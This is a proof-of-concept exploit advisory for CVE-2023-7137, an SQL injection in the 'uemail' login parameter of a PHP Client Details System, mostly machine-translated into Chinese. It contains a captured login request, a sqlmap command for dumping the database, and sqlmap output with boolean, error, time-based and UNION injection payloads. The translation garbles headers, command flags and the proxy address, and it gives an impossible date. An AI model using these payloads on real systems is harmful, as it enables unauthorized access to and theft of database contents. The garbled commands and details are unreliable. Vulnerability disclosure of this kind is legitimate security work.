- ** exploit title: ** cve-2023-7137_client_details_system-sql_invistion_1
- *日期: * 2023-26-12
- *剥削作者: * hamdi sevben
- *供应商homepage: * https://code-projects.org/client-details-system-system-in-php-with-with-source-code/
- *软件链接: * https://download-media.code-project...n_in_php_with_with_source_source_code.zip.zip
- *版本: * 1.0
- *测试在: * Windows 10 Pro + PHP 8.1.6,Apache 2.4.53
- ** CVE: ** CVE-2023-7137
- ** CVE-2023-71373360 ** https://vuldb.com/?id.249140
- https://www.cve.org/cverecord?id=cve-2023-7137
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2023-7137
- https://nvd.nist.gov/vuln/detail/cve-2023-7137
客户端详细信息系统1.0允许通过'/clientdetails/'中的参数'uemail'注入SQL注入。利用此问题可以允许攻击者补偿应用程序,访问或修改数据或利用基础数据库中的最新漏洞。
##概念证明:
+转到用户登录页面:'http://localhost/clientdetails/'
+填写电子邮件和密码。
+通过Burp Suite拦截请求,然后发送到中继器。
+将请求复制并粘贴到“ R.TXT”文件。
+捕获的Burp Request:
````````
POST/CLIENTDETAILS/HTTP/1.1
HOST: LOCALHOST
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/WebP,Image/apng,/; Q=0.8
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.5
CACHE-CONTROL:无缓存
内容长度: 317
content-type:应用程序/x-www-form-urlenceded
Referer: http://localhost/clientdetails/
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/100.0.4896.127 Safari/537.36
uemail=[email protected]=log+inpassword=p@ass123
````````
+使用SQLMAP利用。在SQLMAP中,使用“ Uemail”参数转储数据库。
````````
python sqlmap.py -r r.txt -p uemail -p uemail - 风险3-级5- threads 1-随机代理tamper=之间,随机箱-proxy='http://127.0.0.13:808080808080808080808080808080808080
````````
````````
---
参数: Uemail(POST)
Type:基于布尔的盲人
title:或基于布尔的盲人- 在哪里或有子句(不)
payload: uemail=[email protected]'或否6660=6660-- flrflogin=log inpassword=p@ass123
type:基于错误的
title: mysql=5.0和基于错误的- 在哪里,订购,按子句(floor)
payload: uemail=[email protected]'和(从(选择6854)(选择count(*),concat(0x717a717a71)(0x717a717a71 inpassword=p@ass123
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
payload: uemail=[email protected]'and(从(select(select(5)))qspa中选择5335
type:联合查询
title:通用联盟查询(null)-7列
payload: uemail=[email protected]'联盟全部选择null,concat(0x717a717a71,0x4557525949495444444444444444456f48756464694674747155555555554D6F794D777777767 7A4F50547145735052567278434F,0x7176627871),null,Null,Null,Null,Null,Null,Null,Null,Null --- login=log inpassword=p@ass123
---
[14:58:11] [INFO]后端DBMS是MySQL
Web Application Technology: Apache 2.4.53,PHP,PHP 8.1.6
后端DBMS: mySQL=5.0(Mariadb叉)
[14:58:11] [信息]获取当前数据库
当前数据库:“登录系统”
````````
+当前数据库:“登录系统”
